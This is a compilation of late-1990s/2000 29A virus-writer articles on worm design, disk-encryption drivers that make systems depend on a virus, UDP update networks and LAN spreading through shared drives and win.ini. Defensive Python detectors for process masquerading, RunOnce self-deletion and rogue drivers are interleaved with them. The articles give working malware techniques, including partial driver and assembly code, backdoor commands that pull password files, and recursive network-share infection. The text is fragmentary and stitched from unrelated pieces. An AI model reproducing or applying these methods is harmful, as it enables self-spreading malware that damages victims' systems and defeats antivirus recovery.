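                findings.append((p.pid, f"{p.name} running from {p.image_path or '<no path>'}"))
            continue
        closest = min(PROTECTED_NAMES, key=lambda n: edit_distance(name, n))
        if edit_distance(name, closest) <= MAX_LOOKALIKE_DISTANCE:
            findings.append((p.pid, f"{p.name} looks like {closest}"))
    return findings


# Constructed snapshot of a Windows 2000 box with one renamed worm copy and
# one misspelt lookalike; not a real capture.
SAMPLE_PROCS = [
    Proc(8, "System", "", 0),
    Proc(140, "smss.exe", r"C:\WINNT\system32\smss.exe", 8),
    Proc(164, "csrss.exe", r"C:\WINNT\system32\csrss.exe", 140),
    Proc(184, "winlogon.exe", r"C:\WINNT\system32\winlogon.exe", 140),
    Proc(212, "services.exe", r"C:\WINNT\system32\services.exe", 184),
    Proc(224, "lsass.exe", r"C:\WINNT\system32\lsass.exe", 184),
    Proc(1124, "services.exe", r"C:\WINNT\Temp\services.exe", 1088),
    Proc(1300, "crcss.exe", r"C:\WINNT\system32\crcss.exe", 1088),
    Proc(1400, "explorer.exe", r"C:\WINNT\explorer.exe", 1088),
]

if __name__ == "__main__":
    for pid, reason in masquerading(SAMPLE_PROCS):
        print(f"pid {pid}: {reason}")
```

On the constructed snapshot this reports pid 1124 (services.exe started from the Temp directory) and pid 1300 (crcss.exe, two edits away from csrss.exe); the genuine system processes are left alone because their image path is under System32.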
for such a worm, it is very important to stay undetected for as long as
possible. it's better to delete the worm than to get detected - I recommend
that if your worm "thinks" it has been detected (a resident AV program
detected, a debugger detected, the task manager opened, etc.), the worm should
delete itself immediately. how? under Win95 you can delete even already opened
filez by simply calling the DeleteFile(A/W) API. under Win98/NT/2k this is not
possible. you can call the MoveFileEx API with the MOVEFILE_DELAY_UNTIL_REBOOT
flag, which deletes an already opened program at the next start of the OS. but
this flag is not implemented under Win95/98 :( so you have to use a smarter
way... one possible way is to write to the registry key
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce a value such as
%comspec% /C del <path_to_worm\worm_file_name.exe> and reboot the OS. this
line will delete the worm at the next start of the OS.
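The RunOnce trick leaves a very characteristic artefact: an autostart value that runs the command interpreter only to delete a file. The following detector is an added example, not code from the article; it parses a constructed regedit-style export of the Run/RunOnce keys (the key paths are the real ones, the values are invented) and reports entries that fit this pattern.

```python
"""Spot self-deletion commands parked in Run/RunOnce values.

Added example (not from the article). Input is text in the format regedit
exports (one "name"="data" line per value); the sample below is constructed.
"""
import re

KEY_LINE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_LINE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"="(?P<data>(?:[^"\\]|\\.)*)"$')

# Programs that are the command interpreter on Win9x/NT, plus the %comspec% alias.
SHELLS = {"%comspec%", "cmd", "cmd.exe", "command", "command.com"}
# Built-in verbs that remove files or directories.
DELETE_VERBS = re.compile(r"\b(del|erase|rd|rmdir)\b", re.IGNORECASE)


def unescape(s: str) -> str:
    """Undo regedit's backslash escaping (\\\\ -> \\, \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str):
    """Yield (key, value_name, data) for every string value in the export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_LINE.match(line)
        if m and key is not None:
            yield key, unescape(m.group("name")), unescape(m.group("data"))


def is_self_delete(command: str) -> bool:
    """True if the command only invokes the shell to delete something."""
    parts = command.strip().split(None, 1)
    if not parts:
        return False
    program = parts[0].strip('"').lower()
    program = program.rsplit("\\", 1)[-1]  # tolerate a full path to cmd.exe
    if program not in SHELLS:
        return False
    args = parts[1] if len(parts) > 1 else ""
    return bool(DELETE_VERBS.search(args))


def find_self_delete(text: str):
    """Return (key, value_name, command) for autostart values that self-delete."""
    hits = []
    for key, name, data in parse_reg_export(text):
        if key.lower().endswith(("\\run", "\\runonce", "\\runservices")):
            if is_self_delete(data):
                hits.append((key, name, data))
    return hits


# Constructed export; the key paths are real, the values are invented.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wormcleanup"="%comspec% /C del C:\\WINDOWS\\TEMP\\worm.exe"
"Setup"="C:\\WINDOWS\\setup\\postinst.exe /quiet"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SysTray"="SysTray.Exe"
"cleaner"="cmd.exe /c erase /f /q \"C:\\Program Files\\x\\x.exe\""
'''

if __name__ == "__main__":
    for key, name, cmd in find_self_delete(SAMPLE_EXPORT):
        print(f"{key}\\{name}: {cmd}")
```

The check deliberately keys on the program being a command interpreter plus a deletion verb rather than on the worm's file name, since the name is the one thing the author chooses freely.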
C) this is very important stuff. if the user is at least a bit smart, he won't
open a message like "open attachment blah.exe, there is one very useful util".
it is also a stupid way to spread a worm. but how to spread the worm without
user interaction? do you know what a remote exploit is? a remote exploit is a
program that uses known bugz of a system/program to execute some code on a
remote machine. I'm sure ya have already heard about it. Outlook Express
exploits are very well known - for instance the <DATE> buffer overflow bug: if
the DATE item of a mail message contains more than the standard count of
characterz, the code placed after the DATE item is executed without any
notification to the user. stupid, eh? but it worx. in Windowz there are
thousandz and thousandz of bugz; just open your inet browser and visit
www.securityfocus.com - there is bugtraq, the mailing list about security
bugz - there you can find much information about known bugz and, that's also
important, fully working exploits.
the idea is to create an updatable database of exploits that would be used for
attacking machines. not too easy, but also not too hard to code.
D) how will the worm be able to learn? hmm, the word "learn" is not correct.
in this case, "learn" = "be able to update itself to a newer version". at the
start of execution the worm should check whether there is any newer version of
the worm on the internet, and if there is, download it and update itself, which
means run the downloaded worm and delete itself.
E) but how will we update the worm? where will the newer version be placed?
what will the communication channel be? how to hide it? here come some ideaz:
1) HTTP/FTP: the easiest method. you, as the author, place the updated
   versions of the worm on some public internet site and from there the
   wormz download the new versions. advantages: easy to code (use the
   WININET.DLL library), easy to update, easy to debug. everything is easy
   in this case. disadvantages: easy to detect, easy to clean (AVerz/police
   can contact the provider to take the site down, or they can simply put
   a fake worm there (e.g. a cure) and all wormz will clean themselves).
   this method is not very good.
3) your own protocol: yep, code yer own communication protocol, with cipher
   support (I recommend public-key cryptography, so that only updates coming
   from you are accepted). how? I have some ideaz in my head, but I won't
   explain them here, that's yer work :) but believe me, it's not as hard to
   code as it loox at first sight.
F) to make detection of yer worm harder, use polymorphism. don't forget that
such a poly engine should encrypt and morph the .code and .data sectionz as
well. my idea is to construct a poly worm this way:
- code it as a backdoor: once the computer becomes infected, the worm will give
  you access to it. you will be able to send commandz (such as dir,
  sendme c:\windows\admin.pwl, delete c:\*.log, etc...) and the worm will
  carry them out.
- code it as a soldier: the worm will know instructionz and will act on them.
  i know two wayz to do that:
  a) as a parameter you pass the URL of some script file. the worm will
     download it and work through it. the script file may look like:
  b) as a parameter you pass the URL of some executable file. the worm will
     download it and execute it. that file will do the rest.
by using these featurez your worm can work as a tool for hacking, as a tool for
file transfer, as whatever you want. but don't forget to guarantee that the worm
will accept only YOUR commands, or some childish lamer can abuse your worm.
this was a brief description of the featurez a gewd worm should have. ofcoz
you don't need to use all of them, e.g. portability; it's only up to you :-)
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ The "Project XTC" ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I believe the golden age of superb wormz will come. the wormz from before the
year 2000 are toys. let's show the world that toys are not the only sort of
programz we can code... the golden age will come soon...
if you would like to discuss this theme with me, feel free to mail me.
that's all folks!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
# Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÉÄÄÍ[ How to make infected system to depend on the virus ]ÍÄÄ»
º ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ º
ÈÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍÍ[ by Prizzy/29A ]ÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍͼ
This article is intended for vx authors who want to equip their viruses with
a method whereby the infected computer becomes dependent on the virus. In
that case, if an antivirus cleaned all infected files, the computer would
become inaccessible. And, as we can assume, no antivirus will disinfect files
by such a special method.
Index
ÄÄÄÄÄ
1. The methods of the system's subjection
2. Files Encryption
2.1. Substandard File Access
3. Disk Encryption
3.1. Big Three in Action
3.2. DOS Driver
3.3. Win95/98/ME Driver
3.3.1. Loading the driver
3.3.2. What's inside?
3.3.3. How to load DOS driver
3.3.4. Dynamic Loading
3.4. WinNT/2k Driver
3.4.1. How to compile the driver
3.4.2. Driver Source
3.4.3. Disk Operations
3.4.4. How to load DOS & VXD driver
3.4.5. Driver loading
3.5. Debugging Drivers
4. Conclusion
2. Files Encryption
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It doesn't give the virus full control over the computer, and even this
method is somewhat limited. Every file request from the system, for example
an open request, goes through the virus, which will:
þ encrypt, let's say, the first 2kb of the file
þ on every read request decrypt those 2kb of the file
þ on the close request encrypt those 2kb back
This method is realized in the Win32.Crypto virus.
3. Disk Encryption
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It generally means a virus can gradually encrypt some parts of the disk.
Usually it isn't good to encrypt the whole disk's data, but only some
sections (for example every tenth cluster etc). Thereby the user won't
notice any slowing down of his system. I'd say this way is harder to program
than file encryption (mainly testing the virus). This method can be realized
by drivers (for the full Win32 family) or by the virus without any driver
(only for WinNT and Win2000).
þ the driver immediately restores the old partition code from the buffer;
  the destination offset is 0:7C00.
þ hook the INT 13h service and then go back
The best way to load a static VXD is to copy it to the SYSTEM\IOSUBSYS
directory; after the next restart Windows will load and register it
automatically.
If you want to load VXD immediately you must call following code:
VxDName db "\\.\driver.vxd",0
hVxD dd ?
.386p
include vmm.inc
include vwin32.inc
Begin_control_dispatch DRIVER
Control_Dispatch Device_Init, OnDeviceIoControl
End_control_dispatch DRIVER
EndProc OnDeviceIoControl
That's all for now. We just hooked one VMM function, IOS_SendCommand; in the
SC_Hook function we will catch all system disk access going through ring0.
BeginProc SC_Hook
; this service has the same params like IOS_SendCommand func.
; esi ... IOR structure \ more in DDK 98
; edi ... DCB structure /
pusha
cmp byte ptr [sc_already_inside],0 ;re-call ?
jnz sc_exit
mov byte ptr [sc_already_inside],1
; own algorithm
...
...
There are two ways of returning to the host: either by returning a status code
or by callbacks. I remember when I was coding the VXD driver I had some
problems with callbacks, so I will do my best so you won't stay in the dark.
OR
; set the callback
mov esi,[sc_ior_address] ;get IOR structure address
mov eax,[esi].IOR_callback ;get old callback address
mov [esi].IOR_callback,offset sc_callback
mov [sc_old_callback],eax
popa
jmp [sc_orig_funct] ;call IOS_SendCommand
sc_callback:
pusha
...
popa
cmp [sc_old_callback],0 ;is there any old cback. ?
jz sc_wn_exit_ret
jmp [sc_old_callback] ;yeah, jump there
sc_wn_exit_ret:
ret ;no callback
#include <ntddk.h>
#include "driver.h"
// The name of the device which we will hook; in SoftICE you can
// type "DEVICE" or "DRIVER" to look at those. "%d" is the number
// of the physical disk (0 = the first disk, which normally holds C:)
#define DiskDeviceName "\\Device\\HardDisk%d"
#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT,DriverEntry)
#endif
devExt = hookDevice->DeviceExtension;
devExt->DeviceObject=hookDevice;
devExt->DriverObject=DriverObject;
return STATUS_SUCCESS;
PIO_STACK_LOCATION currentIrpStack;
PIO_STACK_LOCATION nextIrpStack;
PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;
IO_STATUS_BLOCK IoStatus;
// Now check the encryption range and find out whether this
// read request must be decoded or not.
...
Now we have two ways to go back: normally, through the return value, or we
can use a completion callback.
OR
IoSetCompletionRoutine(Irp,
DiskReadCompletion,
DeviceObject,
TRUE,
TRUE,
TRUE);
PIO_STACK_LOCATION IrpSp;
PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;
return STATUS_SUCCESS;
if (IoCallDriver(devExt->attachedDevice, localIrp)
== STATUS_PENDING)
KeWaitForSingleObject(&event,
Suspended,
KernelMode,
FALSE,
NULL);
return NT_SUCCESS(IoStatus.Status);
...
offset.HighPart = offset.LowPart = 0;
// Set an event.
KeInitializeEvent(&event,
NotificationEvent,
FALSE);
return localIrp->IoStatus.Status;
if (hPhysicalDrive != INVALID_HANDLE_VALUE)
{
MBR data;
DWORD dwBytesRead;
...
}
þ To use the driver: you can load it dynamically (more below) and it will
  use IoBuildSynchronousFsdRequest to read/write the sectors. This manner
  is better because you can't know whether the user is an administrator.
So, we successfully loaded the DOS driver and now we must do the same for
the VXD driver. This is easier, but we must know whether the user has a
Win95/98 system or not. We have two ways to find it out:
þ Compare typical Win9x directories, like:
  C:\Windows, C:\Win95 or Win98 etc...
þ Create a thread which will search the disk step by step.
"ImagePath"   ,REG_EXPAND_SZ,"System32\DRIVERS\driver.sys"
"Description" ,REG_SZ       ,"The virus NT/2k driver."
"DisplayName" ,REG_SZ       ,"VX_SYS"
"ErrorControl",REG_DWORD    ,1 ;normal
"Start"       ,REG_DWORD    ,1 ;system start (0 would be boot start)
"Type"        ,REG_DWORD    ,1 ;kernel driver
.386
.model flat,stdcall
includelib c:\...\advapi32.lib
extrn OpenSCManagerA:proc
extrn CreateServiceA:proc
extrn GetCurrentDirectoryA:proc
extrn lstrcat:proc
extrn CloseServiceHandle:proc
extrn StartServiceA:proc
extrn DeleteService:proc
.data
DosDeviceName db "\\.\"
DriverName db "driver.sys",0
_ServiceExe db "\driver.sys",0
.data?
schSCManager dd ?
schService dd ?
...
push 0
call ExitProcess
end start
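A defender auditing the service database decodes the same values as the registration above, the other way round. This is an added example, not code from the article or from the driver it describes: it normalises the ImagePath spellings the service control manager accepts (relative to System32, \SystemRoot\..., %SystemRoot%\..., \??\C:\...), decodes the Start value (boot start is 0, system start is 1), and flags kernel drivers whose image lies outside System32\drivers or is missing from a constructed inventory of driver files. The service records and the inventory are made up.

```python
"""Audit kernel-driver service entries for out-of-place or unknown images.

Added example (not from the article). The service records and the file
inventory below are constructed; on a live system they come from
HKLM\\SYSTEM\\CurrentControlSet\\Services and a directory listing.
"""
import ntpath

SERVICE_KERNEL_DRIVER = 1
SERVICE_FILE_SYSTEM_DRIVER = 2
START_NAMES = {0: "boot", 1: "system", 2: "auto", 3: "demand", 4: "disabled"}
DRIVER_DIR = "system32\\drivers\\"


def normalize_image_path(image_path: str) -> str:
    """Reduce the ImagePath spellings the SCM accepts to 'system32\\...'.

    Handles: 'System32\\DRIVERS\\x.sys', '\\SystemRoot\\System32\\...',
    '%SystemRoot%\\System32\\...' and '\\??\\C:\\WINNT\\System32\\...'.
    """
    p = image_path.strip().strip('"').lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    p = p.replace("%systemroot%", "").replace("\\systemroot", "")
    p = ntpath.splitdrive(p)[1]
    parts = [x for x in p.split("\\") if x]
    # '<windir>\system32\...' -> 'system32\...' (the windir name varies)
    if len(parts) >= 2 and parts[1] == "system32":
        parts = parts[1:]
    return "\\".join(parts)


def audit_driver_services(services, known_driver_files):
    """Return (service name, start mode, [reasons]) for suspicious drivers."""
    findings = []
    for svc in services:
        if svc["Type"] not in (SERVICE_KERNEL_DRIVER, SERVICE_FILE_SYSTEM_DRIVER):
            continue
        path = normalize_image_path(svc["ImagePath"])
        reasons = []
        if not path.startswith(DRIVER_DIR):
            reasons.append(f"image outside {DRIVER_DIR}: {svc['ImagePath']}")
        if path not in known_driver_files:
            reasons.append(f"image not in inventory: {path}")
        if reasons:
            findings.append((svc["Name"], START_NAMES.get(svc["Start"], "?"), reasons))
    return findings


# Constructed service records (the field names are the real value names).
SAMPLE_SERVICES = [
    {"Name": "Disk", "Type": 1, "Start": 0,
     "ImagePath": r"\SystemRoot\System32\DRIVERS\disk.sys"},
    {"Name": "Npf", "Type": 1, "Start": 3,
     "ImagePath": r"\??\C:\WINNT\system32\drivers\npf.sys"},
    {"Name": "Spooler", "Type": 16, "Start": 2,
     "ImagePath": r"%SystemRoot%\system32\spoolsv.exe"},
    {"Name": "VX_SYS", "Type": 1, "Start": 1,
     "ImagePath": r"System32\DRIVERS\driver.sys"},
    {"Name": "hider", "Type": 1, "Start": 1,
     "ImagePath": r"\??\C:\WINNT\Temp\hider.sys"},
]

# Constructed inventory of driver files actually present under System32\drivers.
KNOWN_DRIVERS = {"system32\\drivers\\disk.sys", "system32\\drivers\\npf.sys"}

if __name__ == "__main__":
    for name, start, reasons in audit_driver_services(SAMPLE_SERVICES, KNOWN_DRIVERS):
        print(f"{name} ({start} start): " + "; ".join(reasons))
```

On the constructed data VX_SYS is reported because no such file is in the inventory, and hider for both reasons; the Spooler entry is skipped because it is a Win32 service, not a driver.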
Some rich vxers who have two computers can use the second one as a kernel
debugger; the exact instructions are in the 2k DDK. You only need to make a
null-modem serial cable (show us your electrotechnic knowledge!).
4. Conclusion
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
If I had the possibility to write a virus sometime in the future, I would
surely choose this method as a 100% attack against antiviruses. For some
vxers it can be hard to code, but "Files Encryption" at least would be easy
to realize. Finally, I wish that instead of all the anti-* techniques you
could use one quite certain way, leading to the paralysis of antiviruses.
25th-26th November 2000, the Czech Republic
Prizzy/29A
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
NetWork Distributed Viruses
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
by Bumblebee/29A
Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄ
But I think it could be made so that the virus updates itself from a more
advanced virus. Of coz for this we need to define at least, and maybe not at
last, two protocols: one for network communication and an interface for
updating.
Network Protocol
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The idea I have in mind is that a virus can be a server or a client. The
way the virus acts depends on some noise, to avoid more than one server on
the same sub-network. For this idea I want to use the UDP protocol, which is
simple to manage, and coz we're coding a virus we don't care about packet
loss :)
Some defines:
Let's begin!
Initial state: E0
It may seem a bit complex, but it isn't! It handles network errors, that is,
UDP packet loss, in a way that is not efficient in data terms, but it is easy
to code, without annoying ACKs and NACKs going up and down the wire.
What the hell do we get with this protocol? We have different servers in
different sessions (and maybe in the same session hehe ;) And the best thing
is that the sysadmin only knows the server IP, that's only one infected
machine. To get the others you must wait for another virus to become server,
and this will take WAITTIME+RANDOM (random noise to avoid two or more servers
running at a time... but it is not needed and really doesn't work very well
if machines switch on in a random way). Of coz avers can code a fake
server... but surely this is annoying for them, isn't it?
Battlefield
ÄÄÄÄÄÄÄÄÄÄÄ
Maybe you (lo reader!) are a bit lost with my M.E.F., so I'm going to
write here an example of the protocol working:
As you can see it's not as complex as it seems. It's hard to get it the
first time, but soon you will start thinking about adding more things to
it :)
That's all from the theory side. But let's walk a bit into a simple
implementation.
UDP sockets are connectionless. But it also means that you're not sure the
packets arrive. As I said before, don't care. We are coding a virus and
moreover UDP is quite reliable on local networks (the machines in the same
ISP as you when you're connected to the internet are very likely to receive
those packets). And more than one server is not bad after all, coz each
client will use ONLY ONE server. The worst case will be 'n' viruses and 'n'
servers, that's no communication!
Implementing server-to-server communication is very hard, forget it!
That's enough by now. If you want you can send me your ideas and
comments. Let's start our own RFC! hehe
Last turn off the lights
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
I hope you're not thinking: 'I'm lost. Will it really update a virus?'
The idea is that you add a new module to your updatable virus and then you
can spread it to see how it updates your other samples out there. At
least the next generations will be updated :) That improves the machine-to-
machine update approach using networks. And don't rely on a web address
anymore!
Another point is that you can use this distributed system for other things,
like the payload. What happens if the server triggers a SHUTDOWN message?
Just imagine several machines closing Windows at the same time... isn't it
a wonderful world?
ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Foreword ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
Hello, ppl!! Here I come with another tutorial that I hope will help
you discover the world of local network infection. This idea is quite old,
but, as you all know me, I like to take my share in exposing even older ideas
in the best way I can think of.
The questions which arise here are quite straightforward: what is a local
network, and why do we need to infect the local network? The first question
will be answered further on, but the second one is suitable for a foreword,
wouldn't you say so?
So, besides home computers, where do most computers exist? I will tell you:
in offices, in internet cafes and in exhibitions. And these are places where
computers NEED to be linked into a network. An office is a typical place
where people need to share computer resources in order to be more efficient.
It's a typical place where data needs to be stored on secured servers that
are able to back up data, so that if one workstation fails nothing gets lost.
It's a typical place where people have shared folders on the server and
exchange Excel spreadsheets and Word documents. The same thing applies to
internet cafes. Here, even more so, computers are linked into a network and
people run executable files, most of them games, IRC and email clients. Let
us not forget also the school and college computer labs, where students come
to learn the magic world of programming...
But, I repeat, how the virus breaks free out of the local network is not our
main concern here. Our problem is how we can spread our code into the local
network, increasing the probability that it will get out of there, or that
it will be kept for years on the backup tapes... which is also a pretty neat
thing to happen...
ÚÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Credits ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÙ
Let me not forget first of all to mention all the guys that inspired me
in LAN infection through their work and articles! My 29A mates and all the
rest that used the following technique!
ÚÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Basics ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Local network - hardware ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
It's not really our business to discuss the hardware of the local network,
but I will just say a few words here. Usually, in a local network we have a
server. This is basically a normal computer, but with very high resources
(huge and fast harddisks, lots of RAM, etc). The server is linked to a hub.
The hub is just a small device that has a defined number of ports, which
gives the number of resources (other computers or devices) that can be
connected to the server. If the network is also on line, one of the ports is
taken by a router, or by another computer that acts as a firewall. All of
the remaining ports have wires that go directly to the other computers
(workstations). The workstations have the wires connected into the network
board in the back (it has to have 2 lights, one always on, and one flashing
as info goes through the network). More or less, this is everything you will
ever need to know about LANs, if you are not going to become a network
administrator... So, let's move forward to the software part...
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Local network - soft representation ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
As one might expect, the local network can be accessed either using the
"My Computer" icon, or the "Network Neighbourhood". There you can see all
the computers that are currently connected to the network. You can double
click on them and see what is shared (whatever is shared has a small hand
drawn over the icon). Most of the time you will only have a printer or some
other external device shared, but sometimes you can find the entire harddisk
of the remote computer shared. Basically you can access the shared drives as
if they were folders on your own workstation, and this is what the LAN
spreading viruses will try to use. Depending on the security level of the
network, the resources might be protected by individual passwords or not.
Root of network
³
ÃÄÄ Container1
³   ÀÄÄ Resource6
ÃÄÄ Resource2
ÀÄÄ Container2
    ÃÄÄ Resource3
    ÀÄÄ Container3
        ÃÄÄ Resource4
        ÀÄÄ Resource5
So, not only does it look like a harddisk file system, it is exactly like a
file system. A container is a resource that has other resources in it, and
a final resource has no other branches. Simplified, a resource can be a
printer or another disk (hdd, floppy, cd, etc). This is, again, presented
very briefly, only the basic things that we need to infect the LAN.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Microsoft's LAN standard ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The MPR library is the library that you need in order to be able to roam
the LAN. The file is called MPR.DLL and can be found in the system
directory (SYSTEM or SYSTEM32). Your program must first load this library
and get the addresses of the needed functions before it can attempt to
access the LAN. There's nothing special about that, just use the LoadLibrary
API and load it like any other library.
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
Unbelievable, huh? Only three APIs and we can do all that? Well, you will
see that it is a little tricky to program these APIs, because you must use
reentrant procedures that save data on the stack, you need to allocate and
free memory, but this will come just a little bit later on. First let's
break down these APIs:
Where:
dwUsage - what is the usage of this resource? The value might be one of the
following:
Ok, this structure is very important for us. As you will see, we shall have
to browse the network as if we were browsing the files on a HDD, and this
structure will give us all the needed information. But to do this, first we
have to open an enumeration handle. This is done with this function:
WNetOpenEnumA(
IN DWORD dwScope,
IN DWORD dwType,
IN DWORD dwUsage,
IN LPNETRESOURCEA lpNetResource,
OUT LPHANDLE lphEnum
);
So, you must tell the system what scope, what type and what usage of
resource you are looking for, you must provide a pointer to a NETRESOURCE
structure describing the container to enumerate, and it will return to you
the handle to the enumeration. Usually when you first use this function you
begin with a NULL parameter for lpNetResource, which means the root of the
network is to be browsed. After you have opened the enumeration, you must
start enumerating resources:
WNetEnumResourceA(
IN HANDLE hEnum,
IN OUT LPDWORD lpcCount,
OUT LPVOID lpBuffer,
IN OUT LPDWORD lpBufferSize
);
lpcCount - how many entries do you want to see? Usually you put here a big
number like 0FFFFFFFFh (-1) and as many entries as fit in the buffer are
returned. The function will return in this field the actual number of
resources that were placed in the buffer.
WNetCloseEnum(
IN HANDLE hEnum
);
Ok, this was a little briefing on the APIs we can use. Let's go deeper and
see some code that will make you understand even better how this is done.
ÚÄÄÄÄÄÄ¿
ÚÙ À¿
³ Code ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÙ
First of all, I do hope that all of you are familiar with the concept of
local variables. This concept is widely used by all high level languages and
it means that you may have variables whose value is stored directly on the
stack, and every time that procedure is called new room is created on the
stack to hold the variables. This is why you can recurse procedures (make
one procedure call itself) without losing the variables' values, because
they are stored on the stack and the stack goes back and forth as you call
or return from procedures. One very important issue here is that when you
define such a procedure the common way, it will result in more or less this:
enter 0008, 00
mov eax, [ebp+0ch]
mov edx, [ebp-04h]
leave
ret
So, you see, you cannot rely on using EBP as a delta handle because the
compiler automatically generates instructions that use EBP for other
purposes. So, you must keep your delta handle in ANOTHER register than EBP!
Also, remember NOT to use the delta handle for the local variables, e.g. if
you have the delta in ESI DO NOT EVER say:
Ok, this being said, let us start defining our network infection procedure.
Basically what we will do is create an enumeration for the root of the
network, and then for each resource which is a container we will open
another enumeration, and so on until we finish all entries. For each
resource which is a disk, we will try to retrieve its name and infect it:
where:
lpnr       = the address of the network resource passed as a parameter
lpnrLocal  = the address of the buffer holding the enumerated resources
hEnum      = a handle to the enumeration
ceEntries  = how many entries in the enumeration
cbBuffer   = the size of the buffer holding enumeration data
And now let's initialize our local variables and try to open the
enumeration:
Now we have the enumeration handle and we have the available memory
to fill the data in... All we have left to do is enumerate the resources:
enumerate: ;
lea eax, cbBuffer ;enumerate all the
push eax ;resources
mov esi, [lpnrLocal] ;where is our memory?
push esi ;
lea eax, ceEntries ;how many entries?
push eax ;
push hEnum ;our enumeration handle
call [edx+_WNetEnumResourceA] ;
;
or eax, eax ;failed?
jnz free_mem ;
Ok, now, if we are here it means that our enumeration was also successful.
The number of entries in this resource tree comes into our local variable
ceEntries. All we need to do is take that into a counter and loop around:
Now, if we have a container, it means that this one itself might have some
other resources inside, so we can recurse this procedure by pushing on the
stack the ESI register, which holds the address of this resource's memory
area:
push esi ;
call NetInfection ;recurse!!
When there is no other tree branch for the current resource we simply
continue looking through the rest of the resources. For this we increase ESI
by 20h, which is the size of the NETRESOURCE structure, and we loop:
get_next_entry: ;
add esi, 20h ;next resource!
pop ecx ;
loop roam_net ;
;
jmp enumerate ;and next enumeration...
free_mem: ;
call [edx+_GlobalFree], [lpnrLocal] ;free the memory
call [edx+_WNetCloseEnum], [hEnum] ;and close enumeration.
;
exit_net: ;
popa ;
ret ;
NetInfection endp ;
You saw that above I made some checks: if the name of the remote resource
is not valid or if it is a floppy disk then no infection occurs, otherwise
we call our Remote Infection procedure. Let me tell you that here one can do
whatever comes into his mind... I mean, ESI holds the name of the remote
computer. What more do you need? I will give you one of the many ways you
can use, one which appeared in several viruses and which proves to be
reliable enough. Its main idea is that if you are connected to another
computer that has a Windows system on it, for sure there will exist there a
folder that will contain the Windows directory... And in the Windows
directory we have the good old Win.ini file, which is still kept for
backward compatibility. Of course we know that almost all Windows
directories are called Windows, Win98, Win95, WinNT, and stuff like that.
What you could do is get the Windows directory on the local workstation and
assume that, as long as the computers are connected into a network, Windows
was installed in the same way, so the directory will be the same. But for
the moment the method of testing various directories is pretty good (it was
used by GriYo in Cholera). So what you need to do is create some strings
like this:
<remote name>\Windows\win.ini
<remote name>\WinNT\win.ini
<remote name>\Win95\win.ini
<remote name>\Win98\win.ini
and check if you can open the win.ini file. If you can, it means you found
it!
The next step is to copy the currently running file over the net into the
Windows directory. That is very easy using CopyFileA. After that you need to
create an entry in the win.ini file to read like this:
And the file file.exe is the infected victim from the local computer, but
under another name. At the next reboot the win.ini file will launch the file
called file.exe and, guess what, the entire Windows directory will get
infected. For the user it will look kinda strange why some application
automatically started running after the reboot but... he will not be able to
do anything about it. And that's because your virus must be equipped with a
cool feature (which appears in Rammstein). Any infected victim must check
the Windows directory, and if it finds the file file.exe there and no entry
in the win.ini file, or if there is an entry and there is no file, then it
must delete the file and the entry, so there will be no trace of the
trespassing files.
